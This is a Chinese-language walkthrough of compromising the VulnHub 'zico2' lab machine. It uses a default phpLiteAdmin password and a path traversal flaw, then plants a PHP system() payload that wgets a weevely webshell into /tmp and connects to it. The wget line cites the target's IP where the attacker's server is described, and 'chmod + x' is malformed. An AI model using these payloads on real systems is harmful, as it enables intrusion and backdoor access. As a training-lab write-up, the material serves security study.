文章目录
环境准备
靶场下载地址:https://download.vulnhub.com/zico/zico2.ova
使用Vmware虚拟机中NAT网络
靶机:192.168.146.152
攻击机 parrot 192.168.146.129
提示:以下是本篇文章正文内容,下面案例可供参考
一、信息搜集
1.服务器信息搜集
-A全面扫描
-p-全端口扫描
nmap -A -p- 192.168.146.152
开放了80端口web服务,22ssh服务和111号端口nfs(network file system)服务
浏览其网站
2.网站信息搜集
dirb目录扫描
dirb是一个基于字典的web目录扫描工具,是信息搜集常用的工具
dirb http://192.168.146.152
发现敏感目录dbadmin下
open link访问页面
**发现一个登录窗口,Google搜索了一下phpliteadmin的默认密码,是admin,并尝试登录**
成功😄O(∩_∩)O进入后台
二、OWASP ZAP进行渗透测试
1、OWASP ZAP简介:
ZAP是OWASP里的工具类项目,全称是OWASP Zed attack proxy,是一款web application 集成渗透测试和漏洞工具,
ZAP主要覆盖了安全性测试里渗透测试即对系统进行模拟攻击和分析来确定其安全性漏洞。ZAP能够以代理的形式来实现渗透性测试,则可以通过对其抓包进行分析、扫描。
2、主要功能:
- 本地代理
- 主动扫描
- 被动扫描
- Fuzzy
- 暴力破解
parrot选择owasp-zap进入
点击主动扫描——开始攻击👇
ps:其中我们最关注的当然是安全性风险项,ZAP 将做出以下标识:
发现这是个高风险路径遍历漏洞
复制其url并整理得以下地址,成功执行↓
http://192.168.146.152/view.php?page=…/…/…/…/etc/passwd
三、利用weevely创建木马
weevely是parrot和kali下集成的一款很好用的针对php语言的webshell管理工具,可用于像一个隐藏的后门。
并且携带了大量渗透测试的管理模块,客户端也可以在本地运行shell命令传输
生成php木马
weevely generate 123456 /root/shell.php
四、parrot本地开启apache服务
用于上传木马到web服务上,以供目标靶机下载木马文件
首先将shell.php移动到/var/www/html里
mv /root/shell.php /var/www/html
然后开启apache服务
service apache2 start
五、后台构造恶意php代码并执行
我们回到后台数据库
在数据库下新建一个shell.php
新建一个table表
在表里插入一个列
最后在列里插入数据👇
1.先进入tmp目录(可读写执行)下,2.使用wget命令下载parrot本地服务器上的木马文件shell.php
3.然后给shell.php加可执行权限
ps:分号;用于执行多条命令
<?php system("cd /tmp;wget http://192.168.146.152/shell.php;chmod + x shell.php;");?>
浏览器访问地址:192.168.146.152/view.php?page=…/…/…/…/usr/databases/shell.php
成功给目标靶机执行上面👆的恶意代码——将木马shell.php下载到服务器tmp底下
然后让其执行木马程序↓
再访问地址:http://192.168.146.152/view.php?page=…/…/…/…/tmp/shell.php
weevely连接木马
weevely http://192.168.146.152/view.php?page=../../../../tmp/shell.php 123456
成功连接到服务器,完成收工😄